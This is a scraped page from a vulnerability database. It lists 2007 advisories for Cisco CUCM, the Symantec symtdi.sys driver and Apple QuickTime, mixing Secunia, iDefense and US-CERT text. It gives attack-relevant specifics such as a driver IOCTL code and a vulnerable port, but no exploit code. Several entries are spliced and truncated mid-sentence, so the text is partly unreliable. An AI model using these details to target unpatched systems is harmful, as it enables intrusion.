VARIoT IoT vulnerabilities database

VAR-200707-0302 | CVE-2007-3776 | CUCM Vulnerability in which important information is obtained |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco Unified Communications Manager (CUCM, formerly CallManager) and Unified Presence Server (CUPS) allow remote attackers to obtain sensitive information via unspecified vectors that reveal the SNMP community strings and configuration settings, aka (1) CSCsj20668 and (2) CSCsj25962.
To exploit this issue, an attacker must have administrative access.
Attackers may exploit these issues to gain access to sensitive information or to cause denial-of-service conditions.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
The Full Featured Secunia Network Software Inspector (NSI) is now
available:
http://secunia.com/network_software_inspector/
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
The vulnerabilities are caused due to unspecified errors and can be
exploited by an unauthorized administrator to e.g. activate and
terminate system services or to view SNMP configuration information
in a CUCM/CUPS cluster environment.
CUCM 5.0/5.1:
Update to CUCM 5.1(2a) -
http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-51?psrtdcat20e2
CUPS 1.0:
Upgrade to CUPS 6.0(1) -
http://www.cisco.com/pcgi-bin/tablebuild.pl/cups-60?psrtdcat20e2
Version 1.0 is reportedly discontinued. The vendor recommends users
to upgrade to version 6.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20070711-voip.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200707-0338 | CVE-2006-5277 | CUCM of CTL Provider Vulnerability in arbitrary code execution in service |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Off-by-one error in the Certificate Trust List (CTL) Provider service (CTLProvider.exe) in Cisco Unified Communications Manager (CUCM, formerly CallManager) before 20070711 allows remote attackers to execute arbitrary code via a crafted packet that triggers a heap-based buffer overflow. Cisco Unified Communications Manager is prone to multiple heap-based buffer-overflow vulnerabilities because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
An attacker can exploit these issues to execute arbitrary code within the context of the vulnerable application. Successful exploits may result in a complete compromise of affected servers. Failed exploit attempts will likely result in denial-of-service conditions. A single-byte overflow vulnerability exists in the CTLProvider.exe and RisDC.exe service components of CUCM, which could be exploited by a remote attacker to render the device unusable or take control of the affected system.
----------------------------------------------------------------------
TITLE:
Cisco Unified Communications Manager Two Vulnerabilities
SECUNIA ADVISORY ID:
SA26043
VERIFY ADVISORY:
http://secunia.com/advisories/26043/
CRITICAL:
Moderately critical
IMPACT:
DoS, System access
WHERE:
From local network
SOFTWARE:
Cisco Unified CallManager 5.x
http://secunia.com/product/12535/
Cisco Unified CallManager 4.x
http://secunia.com/product/12534/
Cisco Unified CallManager 3.x
http://secunia.com/product/2805/
Cisco Unified Communications Manager 5.x
http://secunia.com/product/11019/
Cisco Unified Communications Manager 4.x
http://secunia.com/product/5363/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Unified
Communications Manager (CUCM), which can be exploited by malicious
people to cause a DoS (Denial of Service) or potentially compromise a
vulnerable system.
Note: This vulnerability does not affect CUCM 3.x.
2) An integer overflow error in the Real-Time Information Server
(RIS) Data Collector service (RisDC.exe) can be exploited to cause a
heap-based buffer overflow by sending specially crafted packets to
the vulnerable service (default port 2556/TCP).
Successful exploitation may allow execution of arbitrary code.
SOLUTION:
Apply updated versions:
Vulnerability #1 is corrected in CUCM versions 4.1(3)SR5, 4.2(3)SR2,
4.3(1)SR1 and 5.1(2).
Vulnerability #2 is corrected in CUCM versions 3.3(5)SR2b, 4.1(3)SR5,
4.2(3)SR2, 4.3(1)SR1 and 5.1(2).
See vendor advisory for a detailed patch matrix.
PROVIDED AND/OR DISCOVERED BY:
IBM Internet Security Systems X-Force
ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20070711-cucm.shtml
IBM Internet Security Systems:
1) http://www.iss.net/threats/270.html
2) http://www.iss.net/threats/271.html
----------------------------------------------------------------------
VAR-200707-0450 | CVE-2007-3673 | Symantec AntiVirus Corporate Edition Etc. Symantec symtdi.sys Vulnerability gained in |
CVSS V2: 6.9 CVSS V3: - Severity: MEDIUM |
Symantec symtdi.sys before 7.0.0, as distributed in Symantec AntiVirus Corporate Edition 9 through 10.1 and Client Security 2.0 through 3.1, Norton AntiSpam 2005, and Norton AntiVirus, Internet Security, Personal Firewall, and System Works 2005 and 2006, allows local users to gain privileges via a crafted Interrupt Request Packet (Irp) in an IOCTL 0x83022323 request to \\symTDI\, which results in memory overwrite. Applications running the SYMTDI.SYS device driver are prone to a privilege-escalation vulnerability because the driver fails to adequately sanitize user-supplied input.
Local attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. A successful exploit will completely compromise affected computers. Failed exploit attempts will likely cause the computer to crash. Symantec AntiVirus is a very popular antivirus solution.
Symantec AntiVirus symtdi.sys Local Privilege Escalation Vulnerability
iDefense Security Advisory 07.11.07
http://labs.idefense.com/intelligence/vulnerabilities/
Jul 11, 2007
I. BACKGROUND
Symantec has a wide range of Anti-Virus and Internet Security products
that are designed to protect users from viruses and other harmful
software. More information can be found on the Symantec site at the
following URL.
http://www.symantec.com/
II.
The vulnerability specifically exists due to improper address space
validation when the \\symTDI\ device driver processes IOCTL 0x83022323.
An attacker can overwrite an arbitrary address, including code segments,
with a constant double word value by supplying a specially crafted Irp
to the IOCTL handler function.
III. ANALYSIS
Exploitation allows an attacker to obtain elevated privileges by
exploiting a kernel-mode driver. This could allow the attacker to gain
complete control of the affected system.
Note that since the attacker can only overwrite with a constant
double-word value, exploitation is not completely straight forward.
However, this does not significantly impact the difficulty of
exploitation since code segments can be overwritten within the kernel.
IV. DETECTION
iDefense confirmed this vulnerability in version 5.5.1.6 of Symantec's
symtdi.sys device driver as included with version 10 of Symantec
AntiVirus Corporate Edition. Previous versions and related products
that contain the affected driver are suspected vulnerable.
V. WORKAROUND
iDefense is currently unaware of any effective workaround for this
issue.
VI. VENDOR RESPONSE
Symantec has addressed this vulnerability by releasing updated versions
of the SymTDI.sys device driver. The updated driver has been made
available via LiveUpdate. For more information consult Symantec's
advisory at the following URL.
http://securityresponse.symantec.com/avcenter/security/Content/2007.07.11d.html
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-3673 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
01/10/2007 Initial vendor notification
01/11/2007 Initial vendor response
07/11/2007 Coordinated public disclosure
IX. CREDIT
This vulnerability was reported to iDefense by Zohiartze Herce.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright © 2007 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
----------------------------------------------------------------------
Please see the vendor's advisory for
details.
PROVIDED AND/OR DISCOVERED BY:
Zohiartze Herce, reported via iDefense Labs.
ORIGINAL ADVISORY:
Symantec:
http://securityresponse.symantec.com/avcenter/security/Content/2007.07.11d.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=554
----------------------------------------------------------------------
VAR-200707-0545 | CVE-2007-2392 | Apple QuickTime fails to properly handle malformed movie files |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Apple QuickTime before 7.2 on Mac OS X 10.3.9 and 10.4.9 allows user-assisted remote attackers to execute arbitrary code via a crafted movie file that triggers memory corruption. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime is prone to an information-disclosure and multiple remote code-execution vulnerabilities.
Remote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats.
----------------------------------------------------------------------
TITLE:
Apple QuickTime Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26034
VERIFY ADVISORY:
http://secunia.com/advisories/26034/
CRITICAL:
Highly critical
IMPACT:
Exposure of sensitive information, DoS, System access
WHERE:
From remote
REVISION:
1.1 originally posted 2007-07-12
SOFTWARE:
Apple QuickTime 7.x
http://secunia.com/product/5090/
DESCRIPTION:
Some vulnerabilities have been reported in Apple QuickTime, which can
be exploited by malicious people to compromise a user's system.
1) An unspecified error exists in the processing of H.264 movies.
2) An unspecified error exists in the processing of movie files.
3) An integer overflow error exists in the handling of .m4v files and
can be exploited to execute arbitrary code when a user accesses a
specially crafted .m4v file.
4) An integer overflow error exists in the handling of the "author"
and "title" fields when parsing SMIL files.
5) A design error exists in QuickTime for Java, which can be
exploited to disable security checks and execute arbitrary code when
a user visits a web site containing a specially crafted Java applet.
6) A design error exists in QuickTime for Java, which can be
exploited to bypass security checks and read and write to process
memory. This can lead to execution of arbitrary code when a user
visits a web site containing a specially crafted Java applet.
7) A design error exists in QuickTime for Java due to JDirect
exposing interfaces that may allow loading arbitrary libraries and
freeing arbitrary memory. This can be exploited to execute arbitrary
code when a user visits a web site containing a specially crafted
Java applet.
8) A design error exists in QuickTime for Java, which can be
exploited to capture the user's screen content when a user visits a
web site containing a specially crafted Java applet.
The vulnerabilities are reported in versions prior to 7.2.
SOLUTION:
Update to version 7.2.
QuickTime 7.2 for Mac:
http://www.apple.com/support/downloads/quicktime72formac.html
QuickTime 7.2 for Windows:
http://www.apple.com/support/downloads/quicktime72forwindows.html
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Tom Ferris, Security-Protocols.com and Matt
Slot, Ambrosia Software, Inc.
2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software.
3) The vendor credits Tom Ferris, Security-Protocols.com.
4) David Vaartjes of ITsec Security Services, reported via iDefense.
5, 6, 7) The vendor credits Adam Gowdiak.
8) Reported by the vendor.
CHANGELOG:
2007-07-12: Added link to US-CERT.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=305947
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
OTHER REFERENCES:
US-CERT VU#582681:
http://www.kb.cert.org/vuls/id/582681
----------------------------------------------------------------------
National Cyber Alert System
Technical Cyber Security Alert TA07-193A
Apple Releases Security Updates for QuickTime
Original release date: July 12, 2007
Last revised: --
Source: US-CERT
Systems Affected
Apple QuickTime on systems running
* Apple Mac OS X
* Microsoft Windows
Overview
Apple QuickTime contains multiple vulnerabilities.
I. Description
Apple QuickTime 7.2 resolves multiple vulnerabilities in the way
Java applets and various types of media files are handled. Since QuickTime configures most
web browsers to handle QuickTime media files, an attacker could
exploit these vulnerabilities using a web page.
Note that QuickTime ships with Apple iTunes.
For more information, please refer to the Vulnerability Notes
Database.
II. For further information, please see
the Vulnerability Notes Database.
III. Solution
Upgrade QuickTime
Upgrade to QuickTime 7.2. This and other updates for Mac OS X are
available via Apple Update.
On Microsoft Windows, QuickTime users can install the update by
using the built-in auto-update mechanism, Apple Software Update, or
by installing the update manually. Disabling QuickTime in your web browser may defend
against this attack vector. For more information, refer to the
Securing Your Web Browser document. Disabling Java in your web browser may defend against
this attack vector. Instructions for disabling Java can be found in
the Securing Your Web Browser document.
References
* Vulnerability Notes for QuickTime 7.2 -
<http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_72>
* About the security content of the QuickTime 7.2 Update -
<http://docs.info.apple.com/article.html?artnum=305947>
* How to tell if Software Update for Windows is working correctly when no updates are available -
<http://docs.info.apple.com/article.html?artnum=304263>
* Apple QuickTime 7.2 for Windows -
<http://www.apple.com/support/downloads/quicktime72forwindows.html>
* Apple QuickTime 7.2 for Mac -
<http://www.apple.com/support/downloads/quicktime72formac.html>
* Standalone Apple QuickTime Player -
<http://www.apple.com/quicktime/download/standalone.html>
* Mac OS X: Updating your software -
<http://docs.info.apple.com/article.html?artnum=106704>
* Securing Your Web Browser -
<http://www.us-cert.gov/reading_room/securing_browser/>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA07-193A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA07-193A Feedback VU#582681" in the
subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2007 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
Thursday July 12, 2007: Initial release
VAR-200707-0549 | CVE-2007-2397 | Apple QuickTime fails to properly handle malformed movie files |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
QuickTime for Java in Apple QuickTime before 7.2 does not properly check permissions, which allows remote attackers to disable security controls and execute arbitrary code via crafted Java applets. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime is prone to an information-disclosure and multiple remote code-execution vulnerabilities.
Remote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats.
----------------------------------------------------------------------
TITLE:
Apple QuickTime Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26034
VERIFY ADVISORY:
http://secunia.com/advisories/26034/
CRITICAL:
Highly critical
IMPACT:
Exposure of sensitive information, DoS, System access
WHERE:
From remote
REVISION:
1.1 originally posted 2007-07-12
SOFTWARE:
Apple QuickTime 7.x
http://secunia.com/product/5090/
DESCRIPTION:
Some vulnerabilities have been reported in Apple QuickTime, which can
be exploited by malicious people to compromise a user's system.
1) An unspecified error exists in the processing of H.264 movies.
This can be exploited to cause memory corruption and may allow
execution of arbitrary code when a user accesses a specially crafted
H.264 movie.
2) An unspecified error exists in the processing of movie files.
3) An integer overflow error exists in the handling of .m4v files and
can be exploited to execute arbitrary code when a user accesses a
specially crafted .m4v file.
4) An integer overflow error exists in the handling of the "author"
and "title" fields when parsing SMIL files.
6) A design error exists in QuickTime for Java, which can be
exploited to bypass security checks and read and write to process
memory. This can lead to execution of arbitrary code when a user
visits a web site containing a specially crafted Java applet.
7) A design error exists in QuickTime for Java due to JDirect
exposing interfaces that may allow loading arbitrary libraries and
freeing arbitrary memory.
8) A design error exists in QuickTime for Java, which can be
exploited to capture the user's screen content when a user visits a
web site containing a specially crafted Java applet.
The vulnerabilities are reported in versions prior to 7.2.
SOLUTION:
Update to version 7.2.
QuickTime 7.2 for Mac:
http://www.apple.com/support/downloads/quicktime72formac.html
QuickTime 7.2 for Windows:
http://www.apple.com/support/downloads/quicktime72forwindows.html
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Tom Ferris, Security-Protocols.com and Matt
Slot, Ambrosia Software, Inc.
2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software.
3) The vendor credits Tom Ferris, Security-Protocols.com.
4) David Vaartjes of ITsec Security Services, reported via iDefense.
5, 6, 7) The vendor credits Adam Gowdiak.
8) Reported by the vendor.
CHANGELOG:
2007-07-12: Added link to US-CERT.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=305947
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
OTHER REFERENCES:
US-CERT VU#582681:
http://www.kb.cert.org/vuls/id/582681
----------------------------------------------------------------------
VAR-200707-0548 | CVE-2007-2396 | Apple QuickTime fails to properly handle malformed movie files |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
The JDirect support in QuickTime for Java in Apple QuickTime before 7.2 exposes certain dangerous interfaces, which allows remote attackers to execute arbitrary code via crafted Java applets. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime of JDirect Is invalid due to a lack of interface.
Remote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats.
----------------------------------------------------------------------
TITLE:
Apple QuickTime Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26034
VERIFY ADVISORY:
http://secunia.com/advisories/26034/
CRITICAL:
Highly critical
IMPACT:
Exposure of sensitive information, DoS, System access
WHERE:
From remote
REVISION:
1.1 originally posted 2007-07-12
SOFTWARE:
Apple QuickTime 7.x
http://secunia.com/product/5090/
DESCRIPTION:
Some vulnerabilities have been reported in Apple QuickTime, which can
be exploited by malicious people to compromise a user's system.
1) An unspecified error exists in the processing of H.264 movies.
This can be exploited to cause memory corruption and may allow
execution of arbitrary code when a user accesses a specially crafted
H.264 movie.
2) An unspecified error exists in the processing of movie files.
3) An integer overflow error exists in the handling of .m4v files and
can be exploited to execute arbitrary code when a user accesses a
specially crafted .m4v file.
4) An integer overflow error exists in the handling of the "author"
and "title" fields when parsing SMIL files.
6) A design error exists in QuickTime for Java, which can be
exploited to bypass security checks and read and write to process
memory.
8) A design error exists in QuickTime for Java, which can be
exploited to capture the user's screen content when a user visits a
web site containing a specially crafted Java applet.
The vulnerabilities are reported in versions prior to 7.2.
SOLUTION:
Update to version 7.2.
QuickTime 7.2 for Mac:
http://www.apple.com/support/downloads/quicktime72formac.html
QuickTime 7.2 for Windows:
http://www.apple.com/support/downloads/quicktime72forwindows.html
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Tom Ferris, Security-Protocols.com and Matt
Slot, Ambrosia Software, Inc.
2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software.
3) The vendor credits Tom Ferris, Security-Protocols.com.
4) David Vaartjes of ITsec Security Services, reported via iDefense.
5, 6, 7) The vendor credits Adam Gowdiak.
8) Reported by the vendor.
CHANGELOG:
2007-07-12: Added link to US-CERT.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=305947
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
OTHER REFERENCES:
US-CERT VU#582681:
http://www.kb.cert.org/vuls/id/582681
----------------------------------------------------------------------
National Cyber Alert System
Technical Cyber Security Alert TA07-193A
Apple Releases Security Updates for QuickTime
Original release date: July 12, 2007
Last revised: --
Source: US-CERT
Systems Affected
Apple QuickTime on systems running
* Apple Mac OS X
* Microsoft Windows
Overview
Apple QuickTime contains multiple vulnerabilities.
I. Since QuickTime configures most
web browsers to handle QuickTime media files, an attacker could
exploit these vulnerabilities using a web page.
For more information, please refer to the Vulnerability Notes
Database.
II. For further information, please see
the Vulnerability Notes Database.
III. Solution
Upgrade QuickTime
Upgrade to QuickTime 7.2. This and other updates for Mac OS X are
available via Apple Update.
On Microsoft Windows, QuickTime users can install the update by
using the built-in auto-update mechanism, Apple Software Update, or
by installing the update manually. Disabling QuickTime in your web browser may defend
against this attack vector. For more information, refer to the
Securing Your Web Browser document. Disabling Java in your web browser may defend against
this attack vector. Instructions for disabling Java can be found in
the Securing Your Web Browser document.
References
* Vulnerability Notes for QuickTime 7.2 -
<http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_72>
* About the security content of the QuickTime 7.2 Update -
<http://docs.info.apple.com/article.html?artnum=305947>
* How to tell if Software Update for Windows is working correctly when no updates are available -
<http://docs.info.apple.com/article.html?artnum=304263>
* Apple QuickTime 7.2 for Windows -
<http://www.apple.com/support/downloads/quicktime72forwindows.html>
* Apple QuickTime 7.2 for Mac -
<http://www.apple.com/support/downloads/quicktime72formac.html>
* Standalone Apple QuickTime Player -
<http://www.apple.com/quicktime/download/standalone.html>
* Mac OS X: Updating your software -
<http://docs.info.apple.com/article.html?artnum=106704>
* Securing Your Web Browser -
<http://www.us-cert.gov/reading_room/securing_browser/>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA07-193A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA07-193A Feedback VU#582681" in the
subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2007 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
Thursday July 12, 2007: Initial release
VAR-200707-0550 | CVE-2007-2402 | Apple QuickTime fails to properly handle malformed movie files |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
QuickTime for Java in Apple QuickTime before 7.2 does not perform sufficient "access control," which allows remote attackers to obtain sensitive information (screen content) via crafted Java applets. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime is prone to an information-disclosure and multiple remote code-execution vulnerabilities.
Remote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats.
----------------------------------------------------------------------
TITLE:
Apple QuickTime Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26034
VERIFY ADVISORY:
http://secunia.com/advisories/26034/
CRITICAL:
Highly critical
IMPACT:
Exposure of sensitive information, DoS, System access
WHERE:
From remote
REVISION:
1.1 originally posted 2007-07-12
SOFTWARE:
Apple QuickTime 7.x
http://secunia.com/product/5090/
DESCRIPTION:
Some vulnerabilities have been reported in Apple QuickTime, which can
be exploited by malicious people to compromise a user's system.
1) An unspecified error exists in the processing of H.264 movies.
This can be exploited to cause memory corruption and may allow
execution of arbitrary code when a user accesses a specially crafted
H.264 movie.
2) An unspecified error exists in the processing of movie files.
3) An integer overflow error exists in the handling of .m4v files and
can be exploited to execute arbitrary code when a user accesses a
specially crafted .m4v file.
4) An integer overflow error exists in the handling of the "author"
and "title" fields when parsing SMIL files.
5) A design error exists in QuickTime for Java, which can be
exploited to disable security checks and execute arbitrary code when
a user visits a web site containing a specially crafted Java applet.
6) A design error exists in QuickTime for Java, which can be
exploited to bypass security checks and read and write to process
memory. This can lead to execution of arbitrary code when a user
visits a web site containing a specially crafted Java applet.
7) A design error exists in QuickTime for Java due to JDirect
exposing interfaces that may allow loading arbitrary libraries and
freeing arbitrary memory. This can be exploited to execute arbitrary
code when a user visits a web site containing a specially crafted
Java applet.
The vulnerabilities are reported in versions prior to 7.2.
SOLUTION:
Update to version 7.2.
QuickTime 7.2 for Mac:
http://www.apple.com/support/downloads/quicktime72formac.html
QuickTime 7.2 for Windows:
http://www.apple.com/support/downloads/quicktime72forwindows.html
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Tom Ferris, Security-Protocols.com and Matt
Slot, Ambrosia Software, Inc.
2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software.
3) The vendor credits Tom Ferris, Security-Protocols.com.
4) David Vaartjes of ITsec Security Services, reported via iDefense.
5, 6, 7) The vendor credits Adam Gowdiak.
8) Reported by the vendor.
CHANGELOG:
2007-07-12: Added link to US-CERT.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=305947
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
OTHER REFERENCES:
US-CERT VU#582681:
http://www.kb.cert.org/vuls/id/582681
----------------------------------------------------------------------
National Cyber Alert System
Technical Cyber Security Alert TA07-193A
Apple Releases Security Updates for QuickTime
Original release date: July 12, 2007
Last revised: --
Source: US-CERT
Systems Affected
Apple QuickTime on systems running
* Apple Mac OS X
* Microsoft Windows
Overview
Apple QuickTime contains multiple vulnerabilities.
I. Description
Apple QuickTime 7.2 resolves multiple vulnerabilities in the way
Java applets and various types of media files are handled. Since QuickTime configures most
web browsers to handle QuickTime media files, an attacker could
exploit these vulnerabilities using a web page.
Note that QuickTime ships with Apple iTunes.
For more information, please refer to the Vulnerability Notes
Database.
II. For further information, please see
the Vulnerability Notes Database.
III. Solution
Upgrade QuickTime
Upgrade to QuickTime 7.2. This and other updates for Mac OS X are
available via Apple Update.
On Microsoft Windows, QuickTime users can install the update by
using the built-in auto-update mechanism, Apple Software Update, or
by installing the update manually. Disabling QuickTime in your web browser may defend
against this attack vector. For more information, refer to the
Securing Your Web Browser document. Disabling Java in your web browser may defend against
this attack vector. Instructions for disabling Java can be found in
the Securing Your Web Browser document.
References
* Vulnerability Notes for QuickTime 7.2 -
<http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_72>
* About the security content of the QuickTime 7.2 Update -
<http://docs.info.apple.com/article.html?artnum=305947>
* How to tell if Software Update for Windows is working correctly when no updates are available -
<http://docs.info.apple.com/article.html?artnum=304263>
* Apple QuickTime 7.2 for Windows -
<http://www.apple.com/support/downloads/quicktime72forwindows.html>
* Apple QuickTime 7.2 for Mac -
<http://www.apple.com/support/downloads/quicktime72formac.html>
* Standalone Apple QuickTime Player -
<http://www.apple.com/quicktime/download/standalone.html>
* Mac OS X: Updating your software -
<http://docs.info.apple.com/article.html?artnum=106704>
* Securing Your Web Browser -
<http://www.us-cert.gov/reading_room/securing_browser/>
VAR-200707-0546 | CVE-2007-2393 | Apple QuickTime fails to properly handle malformed movie files |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
The design of QuickTime for Java in Apple QuickTime before 7.2 allows remote attackers to bypass certain security controls and write to process memory via Java applets, possibly leading to arbitrary code execution. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime is prone to an information-disclosure and multiple remote code-execution vulnerabilities.
Remote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats.
----------------------------------------------------------------------
TITLE:
Apple QuickTime Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26034
VERIFY ADVISORY:
http://secunia.com/advisories/26034/
CRITICAL:
Highly critical
IMPACT:
Exposure of sensitive information, DoS, System access
WHERE:
From remote
REVISION:
1.1 originally posted 2007-07-12
SOFTWARE:
Apple QuickTime 7.x
http://secunia.com/product/5090/
DESCRIPTION:
Some vulnerabilities have been reported in Apple QuickTime, which can
be exploited by malicious people to compromise a user's system.
1) An unspecified error exists in the processing of H.264 movies.
This can be exploited to cause memory corruption and may allow
execution of arbitrary code when a user accesses a specially crafted
H.264 movie.
2) An unspecified error exists in the processing of movie files.
3) An integer overflow error exists in the handling of .m4v files and
can be exploited to execute arbitrary code when a user accesses a
specially crafted .m4v file.
4) An integer overflow error exists in the handling of the "author"
and "title" fields when parsing SMIL files. This can lead to execution of arbitrary code when a user
visits a web site containing a specially crafted Java applet. This can be exploited to execute arbitrary
code when a user visits a web site containing a specially crafted
Java applet.
8) A design error exists in QuickTime for Java, which can be
exploited to capture the user's screen content when a user visits a
web site containing a specially crafted Java applet.
The vulnerabilities are reported in versions prior to 7.2.
SOLUTION:
Update to version 7.2.
QuickTime 7.2 for Mac:
http://www.apple.com/support/downloads/quicktime72formac.html
QuickTime 7.2 for Windows:
http://www.apple.com/support/downloads/quicktime72forwindows.html
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Tom Ferris, Security-Protocols.com and Matt
Slot, Ambrosia Software, Inc.
2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software.
3) The vendor credits Tom Ferris, Security-Protocols.com.
4) David Vaartjes of ITsec Security Services, reported via iDefense.
5, 6, 7) The vendor credits Adam Gowdiak.
8) Reported by the vendor.
CHANGELOG:
2007-07-12: Added link to US-CERT.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=305947
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
OTHER REFERENCES:
US-CERT VU#582681:
http://www.kb.cert.org/vuls/id/582681
----------------------------------------------------------------------
National Cyber Alert System
Technical Cyber Security Alert TA07-193A
Apple Releases Security Updates for QuickTime
Original release date: July 12, 2007
Last revised: --
Source: US-CERT
Systems Affected
Apple QuickTime on systems running
* Apple Mac OS X
* Microsoft Windows
Overview
Apple QuickTime contains multiple vulnerabilities.
I. Description
Apple QuickTime 7.2 resolves multiple vulnerabilities in the way
Java applets and various types of media files are handled. Since QuickTime configures most
web browsers to handle QuickTime media files, an attacker could
exploit these vulnerabilities using a web page.
Note that QuickTime ships with Apple iTunes.
For more information, please refer to the Vulnerability Notes
Database.
